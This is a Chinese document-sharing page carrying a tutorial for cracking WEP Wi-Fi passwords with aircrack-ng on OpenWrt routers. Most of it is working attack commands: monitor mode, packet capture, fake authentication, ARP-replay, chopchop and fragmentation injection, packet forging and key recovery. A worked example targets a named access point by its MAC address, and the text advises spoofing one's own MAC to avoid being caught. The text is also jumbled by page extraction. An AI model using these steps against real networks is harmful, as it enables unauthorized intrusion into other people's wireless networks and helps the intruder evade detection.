openwrt wifi密码

上传人:M****1 文档编号:504461416 上传时间:2023-06-29 格式:DOCX 页数:13 大小:43.75KB
返回 下载 相关 举报
openwrt wifi密码_第1页
第1页 / 共13页
openwrt wifi密码_第2页
第2页 / 共13页
openwrt wifi密码_第3页
第3页 / 共13页
openwrt wifi密码_第4页
第4页 / 共13页
openwrt wifi密码_第5页
第5页 / 共13页
点击查看更多>>
资源描述

《openwrt wifi密码》由会员分享,可在线阅读,更多相关《openwrt wifi密码(13页珍藏版)》请在金锄头文库上搜索。

1、openwrt wifi密码openwrt wifi密码 openwrt aircrack-ng破解 抓wpa、wep包的命令 opkg update opkg install aircrack-ng screen airmon-ng start mon.wlan0 airmon-ng start wlan0 screen cd /mnt/sda1 #这里是保存路径,我是挂U盘保存数据包 airodump-ng -w name mon0 _ 下面是实例破解AP:cisco 加密码方式:WEP 64位 AP频道:11 AP的MAC地址: 00:0F:34:C1:29:CA 我自己的MAC地址:0

2、0:74:04:02:B5:EA opkg update opkg install aircrack-ng opkg install screen /screen支持后台运行 可以后台抓包同时后台注入然后后台破解密码 抓包或破解时可以不用开电脑 /用putty.exe连接路由器新建一个screen 后台运行抓包 screen /扫描信号 iwlist wlan0 scanning airmon-ng start mon.wlan0 /查看无线网信息 /精确 monitor 为11频道。 也就是创建 mon0 可以用airmon-ng stop mon0 关闭 /airmon-ng start

3、wlan0 全频道 airmon-ng start wlan0 11 /开始抓包 在这里会显示扫描到的AP 从这里选择要破解的AP SSID、MAC地址等信息 /airodump-ng -w name mon0 参数 -ivs 只抓WEP -c 11 抓11频道 airodump-ng -ivs -w name -c 11 mon0 /我要破解的cisco 没有客户端 所以下面用注入方式 _ |/抓包方式2: 只抓MAC为00:0F:34:C1:29:CA的包 | |/airodump-ng -c 11 -bssid 00:0F:34:C1:29:CA -w name-01.ivs mon0

4、| |_| /新建一个ssh 会话 /与AP建立虚拟连接 /aireplay-ng -1 0 -a APsMAC -h MyMAC mon0 / -a设置ap的mac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线) -1 fakeauth count 伪装一个客户端和ap进行连接 这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令 aireplay-ng-1 0 -e ap_essid -a ap_mac -h my

5、_mac wifi0 参数说明:0表示岩石0秒后连接;-e设置ap_essid;-a设置ap的mac地址 -h设置伪装客户端的网卡mac地址 -2 interactive 交互模式 这个模式集合了抓包和提取数据,发包注入三种功能 ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0 参数说明:-p设置控制帧中包含的信息,默认采用0841;-c:设置目标mac地址;-b设置ap的mac地址;-h伪装的客户端网卡mac地址 提取包,发送注入数据包 aireplay-ng-2 -r myarp -x 1024 wif

6、i0 参数说明:myarp:自己设置的文件名;-x 1024:发包的速度 -3 arp-request注入攻击模式 这种模式是一种抓包后分析重发的过程 aireplay-ng-3 -b ap_mac -h 合法客户端mac -x 512 wifi0 -4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件 aireplay-ng-4 -b ap-mac -h my_mac wifi0 -5 fragment 碎片包攻击模式,用来获得PRGA aireplay-ng-5 -b ap_mac -h my_mac wifi0 packetforge-ng 数据包制造程序 packetfo

7、rge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp 参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取PRGA;name:xor文件的名字;-w设置伪装的arp包的文件名 aircrack-ng -n 64 -b ap_mac name-01.ivs 参数说明:-n设置key长度 screen 使用 screen -ls 显示screen列表 screen -r id 进入会话 Ctrl-a、

8、Ctrl-c 切换到之前显示的窗口 Ctrl-d 暂时断开会话 C-a n 切换到下一个窗口 C-a p 切换到前一个窗口(与C-a n相对) C-a ? 显示所有键绑定信息 C-a w 显示所有窗口列表 C-a C-a 切换到之前显示的窗口 C-a c 创建一个新的运行shell的窗口并切换到该窗口 C-a n 切换到下一个窗口 C-a p 切换到前一个窗口(与C-a n相对) C-a 0.9 切换到窗口0.9 C-a a 发送 C-a到当前窗口 C-a d 暂时断开screen会话 C-a k 杀掉当前窗口 C-a 进入拷贝/回滚模式 _ Openwrt 下支持 aircrack-ng ,

9、 WRT54G 能破解,那RG100A应该也能,来精神,心动不如行动吧。 首先opewnrt需安装两个Packager。 用SecureCRT 连接 RG100a opkg update opkg install aircrack-ng opkg install screen 后台操作 安装后 就可以进行分析抓包了。 建立无线 的monitor screen (建立screen, 试便下次用screen 登陆回来) 建立monitor 用于数据采集 airmon-ng start mon.wlan0 查看无线网信息 airodump-ng mon0 分析: 查找到三个无线AP均无客户端, WE

10、P无客户端破密有两种方法,1,守株待免,一直开着直到有客户端连接抓到一定数量的data为止, 2,采用aireplay-ng 方式注入产生大量数据包。当 data 数量但到1万左右就应该可以破WEP 密码啦。 = 我使用了第二种方法。注入,破密对象是 HG520s 精确 monitor 为11频道。 airmon-ng start mon.wlan0 11 airodump-ng -ivs -w name -c 11 mon0 对11频道抓包存储在 name文件 攻击 ap之前建立一个虚拟连接 这步是关键 aireplay-ng -1 0 -e HG520s -a 00:16:E3:BB:FD

11、:CF -h 00:1F:A3:B2:11:D0 mon0 注: HG520S 是对方AP, 00:16:E3:BB:FD:CF 是对方MAC, 00:1F:A3:B2:11:D0是RA100A的无线MAC, 用ifconfig 可以查到。 交互功击模式(即注入的其中一种方式) aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:16:E3:BB:FD:CF -h 00:1F:A3:B2:11:D0 mon0 出现 usr this packer ? 输入y 后, 你会看到 看data数量在猛增, 当达到1万时就可以停止,进行解密啦。 aircr

12、ack-ng -a wep name-01.ivs -l key.txt cat key.txt 显示的就是 wep 密码 _ Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个: airmon-ng 处理网卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 发包,干扰 另外还要用到以下 linux 命令: ifconfig 查看修改网卡状态和参数 macchanger 伪造 MAC iwconfig 主要针对无线网卡的工具 (同 ifconfig) iwlist 获取无线网络的更详细信息 另外还有其他的 linux 基本命令,我就不

13、提示了。 具体破解步骤: 1. 修改无线网卡状态:先 down 掉 2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡 4. 修改无线网卡状态: up 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标 6. 监听抓包:生成 .cap 或 .ivs 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解 下面详细介绍一下各个命令的基本用法 1. ifconfig 用来配置网卡,我们这里主要用来 禁

14、用和启用 网卡: ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是为了下一步修改 MAC 。 2.macchanger 用来改变网卡的 MAC 地址,具体用法如下: usage: macchanger options device -h 显示帮助 -V 显示版本 -s 显示当前MAC -e 不改变mac,使用硬件厂商写入的MAC -a 自动生成一个同类型的MAC,同厂商的 -A 自动生成一个不同类型的MAC,不同厂商的 -r 生成任意MAC -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品 -m 设置一个自定义的MAC 如: macchanger -mac=00:34:00:00

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 建筑/环境 > 施工组织

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号